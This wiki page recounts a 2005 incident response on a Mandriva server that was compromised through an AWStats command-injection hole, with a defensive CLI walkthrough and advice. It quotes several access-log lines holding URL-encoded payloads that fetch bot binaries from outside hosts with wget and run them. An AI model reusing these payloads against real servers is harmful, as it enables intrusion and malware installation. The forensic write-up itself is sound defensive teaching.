Docs/Support/Emergencies/Example
From Mandriva Community Wiki
The following play-by-play recap of a troubleshooting session was posted to the Mandriva Expert List during a lengthy discussion of tips for using the CLI. The thread asked whether users who generally shun the command line could benefit from some sort of "cheat sheet" to help them bypass the CLI learning curve in those occasional emergencies where their customary GUI tools are either not available or not useful, and whether creating such a thing in any useful form was even possible. To place it in the context of the thread: James Sparenberg had just emphasized the importance of examining log files when troubleshooting, and this post was offered in support of that excellent point.
Bravo, James - this is so true. Logs are invaluable.
Case in point is a problem that I just ferreted out on this 10.0OE box. I happened to run ps to have a look for a process that I suspected had not properly completed when I had closed the app's window, when lo and behold, I discovered a couple of running processes whose command lines were "./h" and "./mech". These didn't belong, and the hunt was on. ;)
The first step was to find the executables. I ran "ps aux" and took note of the user and PID of each process; they were running as the apache user, which was my first hint as to the method by which they might have arrived. I then ran "/usr/sbin/lsof -p [number]" with each PID number in turn, which told me that both of them were sitting in my /tmp directory.
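As a rough sketch of that first step: the helper below (procs_for_user is a hypothetical name, not a standard tool) reduces `ps aux`-style output to the PID and command line of one user's processes. The sample listing and its PIDs are invented for illustration; on a live system you would pipe in real `ps aux` output and then run lsof -p on each PID it reports.

```shell
# procs_for_user USER: read `ps aux`-style output on stdin and print
# "PID COMMAND..." for each process owned by USER.
# (Hypothetical helper; in `ps aux` output the command starts at field 11.)
procs_for_user() {
    awk -v user="$1" 'NR > 1 && $1 == user {
        line = $2
        for (i = 11; i <= NF; i++) line = line " " $i
        print line
    }'
}

# Invented sample data standing in for real `ps aux` output.
sample_ps='USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   1564   520 ?        S    Mar18   0:04 init
apache    4321  0.0  0.1   1892   736 ?        S    11:43   0:00 ./h
apache    4330  0.0  0.2   2104   980 ?        S    11:43   0:00 ./mech'

printf '%s\n' "$sample_ps" | procs_for_user apache

# On a live system:
#   ps aux | procs_for_user apache
#   /usr/sbin/lsof -p 4321     # then repeat for each PID listed
```

Filtering on the user column first keeps the list short enough that running lsof on every remaining PID is practical.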
Next, I ran "kill -9 [number]" on each PID to end them, and moved the executables out of /tmp and into a quarantine dir that I've set up for just this sort of thing (it has root ownership, with 700 permissions). The "mech" one had also created a subdir, "/tmp/bot", which I also moved into the quarantine dir. I could've just deleted them outright, but this permits me to examine them at my leisure, should I be so inclined.
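The quarantine step might look something like the sketch below. The function name quarantine and the directory names are assumptions made for illustration; the demo runs entirely inside a throwaway temp dir, and it does not set root ownership, since that requires root.

```shell
# quarantine DIR ITEM...: create DIR with mode 700 if needed, then move
# each ITEM (file or directory) into it. Hypothetical helper.
quarantine() {
    qdir=$1
    shift
    mkdir -p "$qdir" || return 1
    chmod 700 "$qdir" || return 1
    for item in "$@"; do
        mv -- "$item" "$qdir"/ || return 1
    done
}

# Demo in a scratch directory, with stand-ins for the files found in /tmp.
scratch=$(mktemp -d)
touch "$scratch/h" "$scratch/mech"
mkdir "$scratch/bot"

quarantine "$scratch/quarantine" "$scratch/h" "$scratch/mech" "$scratch/bot"
ls -ld "$scratch/quarantine"

# On a live system, as root and after killing the processes
# (the quarantine path here is an assumption):
#   quarantine /root/quarantine /tmp/h /tmp/mech /tmp/bot
```

Moving rather than deleting keeps the files available for later examination, and the 700 mode keeps other users from reading or running them in the meantime.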
And I am so inclined. Ohhh, yeah. Precipitously so, ya might say. :)
I then brought down Apache ( /sbin/service httpd stop ) for the duration of the investigation. While I could be fairly confident that this had been these exploits' vector of entry, due to the fact that the critters were running as user apache and apache owned their files in /tmp, I still hadn't nailed down the precise method by which the vermin got in. Was it a hole in Apache itself? In PHP? A poor config? Something else?
Here's where the logs came in very handy. I ran this command:
grep -v ^192.168 /var/log/httpd/access_log | less
For those unfamiliar with grep, this means, "Look through the access_log file for every line that does *not* (-v) begin with '192.168' (^192.168) and pipe these lines into less, so that I can read and search them." This removed the vast bulk of the irrelevant log entries - the LAN here uses 192.168.x.x addresses, and these IPs account for the overwhelming majority of the Apache accesses on this particular system.
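A slightly stricter variant of the same filter, offered as a sketch rather than a correction: quoting the pattern keeps the shell from interpreting it, and escaping the dots makes each one match a literal "." instead of any character. The function name external_hits and the sample log lines (using the documentation address 203.0.113.7) are invented for illustration.

```shell
# external_hits LOGFILE: print access-log lines whose client address
# does not start with 192.168. (hypothetical helper).
external_hits() {
    grep -v '^192\.168\.' "$1"
}

# Invented sample log, for illustration only.
log=$(mktemp)
cat > "$log" <<'EOF'
192.168.0.12 - - [01/Jan/2005:10:00:01 -0500] "GET / HTTP/1.1" 200 1024 "-" "-"
203.0.113.7 - - [01/Jan/2005:10:00:05 -0500] "GET /cgi-bin/example.pl HTTP/1.1" 200 698 "-" "-"
192.168.0.15 - - [01/Jan/2005:10:00:09 -0500] "GET /index.html HTTP/1.1" 200 2048 "-" "-"
EOF

external_hits "$log"

# On a live system:
#   external_hits /var/log/httpd/access_log | less
```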
Skipping to the end of the file (the most recent entries) and working my way backwards, it took very little time to spot the following odd lines:
64.72.88.10 - - [18/Mar/2005:11:43:23 -0500] "GET /cgi-bin/awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3b%20cd%20%2ftmp%20%3bwget%20%aundernet%2eat%2fh%20%3bchmod%20%2bx%20h%20%3b%2e%2fh%3becho%20e_exp%3b%2500 HTTP/1.1" 404 458 "-" "-"
64.72.88.10 - - [18/Mar/2005:11:43:33 -0500] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3b%20wget%20www%2ebaw%2dbaw%2ehome%2ero%2fbot1%2etar%2egz%3btar%20zxvf%20bot1%2etar%2egz%3b%20rm%20%2drf%20bot1%2etar%2egz%3b%20cd%20bot%3b%20%2e%2fmech%3b%20%2e%2fmech%3b%20%2e%2fmech%3becho%20e_exp%3b%2500 HTTP/1.1" 200 1679 "-" "-"
64.72.88.10 - - [20/Mar/2005:11:32:52 -0500] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3b%20cd%20%2ftmp%20%3bwget%20undernet%2eat%2fh%20%a%3bchmod%20%2bx%20h%20%3b%2e%2fh%3becho%20e_exp%3b%2500 HTTP/1.1" 200 698 "-" "-"
64.72.88.10 - - [20/Mar/2005:11:32:54 -0500] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3b%20cd%20%2ftmp%20%3bwget%20undernet%2eat%2fh%20%a%3bchmod%20%2bx%20h%20%3b%2e%2fh%3becho%20e_exp%3b%2500 HTTP/1.1" 404 471 "-" "-"
64.72.88.10 - - [20/Mar/2005:11:33:12 -0500] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3b%20cd%20bot%3b%20%2e%2fmech%3b%20%2e%2fmech%3b%20%2e%2fmech%3becho%20e_exp%3b%2500 HTTP/1.1" 200 537 "-" "-"
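Requests like these are much easier to read once the percent-encoding is undone. The sketch below is one way to do that with awk; urldecode is a hypothetical helper name, and it only converts well-formed %XX sequences, passing anything malformed through untouched. The sample string is a fragment of the configdir value from the last log entry above.

```shell
# urldecode: read lines on stdin and replace each %XX (two hex digits)
# with the character it encodes. Hypothetical helper; single pass only,
# so a decoded "%" is not decoded again.
urldecode() {
    awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    {
        out = ""
        while (match($0, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
            code = hexval(substr($0, RSTART + 1, 1)) * 16 + hexval(substr($0, RSTART + 2, 1))
            out = out substr($0, 1, RSTART - 1) sprintf("%c", code)
            $0 = substr($0, RSTART + RLENGTH)
        }
        print out $0
    }'
}

# Fragment of the configdir parameter from the final request.
fragment='%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3b%20cd%20bot%3b%20%2e%2fmech'
printf '%s\n' "$fragment" | urldecode
# prints: |echo ;echo b_exp;cd /var/tmp; cd bot; ./mech
```

Decoded, the parameter is plainly a chain of shell commands separated by semicolons, injected through a leading pipe character.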
"AWStats?", I said to myself, "I don't even remember installing it!". But of course I had done so; I had played around with it a bit at the time, and had then proceeded to forget all about it. Off I went to the project's homepage, http://awstats.sourceforge.net, where I found this:
Warning, a security hole was recently found in AWStats versions from 5.0 to 6.3 (Partially fixed in 6.3) when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody"). If you use AWStats with a more recent version or if AWStats is not available as a CGI, you are safe. If not, it is highly recommanded to upgrade to 6.4 version that fix all known security holes.
A quick rpm -qa awstats revealed that the version that I had (from 10.0OE contrib) was awstats-6.0-1mdk ... and there was that question answered. I immediately removed it ( urpme awstats ), and then brought Apache back up again ( /sbin/service httpd start ). Done.
Well, almost done, at any rate. A couple of quick host and whois commands brought me the owner of that IP address and their contact info, and an abuse complaint was filed. Next up was a brief write-up of the situation for Vincent and the secteam (for their information only, as contrib packages are unsupported), and then this somewhat more detailed essay on the troubleshooting process for any interested parties here.
Total time, from first run of ps to bringing Apache back up - about 25 minutes, give or take. Writing it up has taken considerably longer than that, and the forensics are in progress. As you can see, every aspect of the fix was done from the CLI; while I was at that time logged in to an X session locally, I could just as well have done the whole thing over ssh from another system, in exactly the same manner. Note that it took the use of just twelve commands other than ls and man (thirteen, if you count that I used sudo for all of the you-need-to-be-root ones):
ps, lsof, kill, mv, service, grep, less, links (to read the web page), rpm, urpme, host, whois
Am I thoroughly familiar with the hundreds of CLI commands available on my system? No; I probably only use a repertoire of 40 to 50 of them on anything approaching a regular basis. Did I have to hit any man pages during this adventure? Yes; the ones for lsof and grep. What were the factors that contributed most to a speedy resolution of the problem?
- It was not the first time that I had used any of these commands, nor am I a complete foreigner to the CLI itself. This is absolutely vital, and cannot be stressed enough - if you studiously avoid the CLI at every opportunity until an emergency arises, you are not going to be able to make effective use of it when that crisis occurs, regardless of how many cheatsheets/HOWTOs you consult at that point. OTOH, if you experiment with it from time to time now, while the pressure is off and the stakes are low, it will not be nearly so daunting a prospect when the time comes that the CLI is the only choice open to you. And that means opening up a terminal every so often, and then putting the mouse out of your easy reach for a little while. It won't kill ya, trust me. :)
- It was also not the first time I had read a man page. I've now referred to enough different ones (and to the same ones often enough each) that I am familiar with their basic structure, and only with that familiarity came the ability to quickly skim through the more verbose ones (grep, rpm) to find the one or two options that I actually need. I see no other way to achieve this but practice, practice, practice. When I see a potentially useful command mentioned here, for example, I pull up its man page and have myself a bit of a read, to learn what it can do. I am aware that most commands have far more options that I will never need than ones that I will, so as I'm learning the capabilities of the command, I keep an eye out for the ones relevant to my needs. I'm not concerning myself with remembering the syntax of even this limited subset of options at this stage (the man page isn't going anywhere, after all); all I'm looking to retain at this point are things like, "lsof is the command to list the open files of a process". I don't just read about them, of course; I "take them out for a test drive" as I'm reading, and thereby make sure that I understand how to work with them at least a little bit.
- On the sage advice of others, I have also put in a little time here and there learning a few of "the basics" about the structure of *nix systems in general, and of Mandrake ones in particular: things like the Filesystem Hierarchy Standard (what goes where, and why), the purpose and effects of permissions and ownerships (who can run/access what, and why), which daemons log data into which logfiles, some of the simpler shell stuff like redirection and pipes, etc. Once one has gained at least some grasp, however tenuous it may be, of the most fundamental concepts that apply throughout every Linux system, life as a sysadmin becomes a lot easier in every respect (and don't kid yourself, if you're the one who knows the root password on that system right in front of you, you're a sysadmin <g>). One analogy would be driving around occasionally in a European nation where you cannot read the local language: would you find that the time you had spent familiarizing yourself with the standard system of signage shapes and colors that has been adopted throughout Europe had been worth your while? I suspect that you would, and furthermore that the entire area would seem far more navigable overall than if you hadn't done so, whether or not you also happened to have a decent map near at hand.
- I make it a point to run ps aux every so often, and have now done so with sufficient frequency to gradually form a clear picture of which processes ought to be running at any given moment, and to which services or apps each one belongs (when you stop Apache, which ones go away? when you start Evolution, which ones appear?); without that knowledge of what output I should expect from ps when all is right with the world, I would never have noticed that anything was unusual about the system at all.
- The box itself lives behind a decent firewall (a repurposed low-spec Duron system that last ran Win98, would choke noisily on XP, and is now headless running SmoothWall Express), and there are only two ports being forwarded to it from the WAN, ssh (22) and http (80). This has two clear advantages: the first one is that those two ways in are pretty much it, short of having to first compromise another of the internal systems, so diagnosis is simplified proportionally, and the second is that any ports on which such rogue apps as these two may be listening for connections will never see a byte of inbound traffic from the outside world.
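The habit of knowing what ps should show can be backed up with a saved baseline. The following is only a sketch under assumptions: new_commands is a hypothetical helper, the file names are arbitrary, and the process names in the demo are invented. It prints every command name in a current listing that does not appear in the baseline.

```shell
# new_commands BASELINE CURRENT: print each line of CURRENT that does not
# appear, as an exact whole line, anywhere in BASELINE. Hypothetical helper.
new_commands() {
    grep -F -x -v -f "$1" "$2"
}

# Invented sample data; on a live system each file could be produced with
#   ps -eo comm= | sort -u > FILE
workdir=$(mktemp -d)
printf '%s\n' init httpd sshd > "$workdir/baseline"
printf '%s\n' h httpd init mech sshd > "$workdir/current"

new_commands "$workdir/baseline" "$workdir/current"
```

A baseline taken while the system is known to be healthy is the useful one; anything the comparison prints afterward is merely a candidate for a closer look, not proof of a problem.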
Well, I've been going on quite long enough, and if you've read this far, I do hope that you found something useful buried within this windy tale. At the very least, if you have AWStats installed on a system that allows access to Apache from the world at large, it might be a good idea to take a brief glance at the version number that you're using ... ;)
-- Main.BillMullen - 22 Mar 2005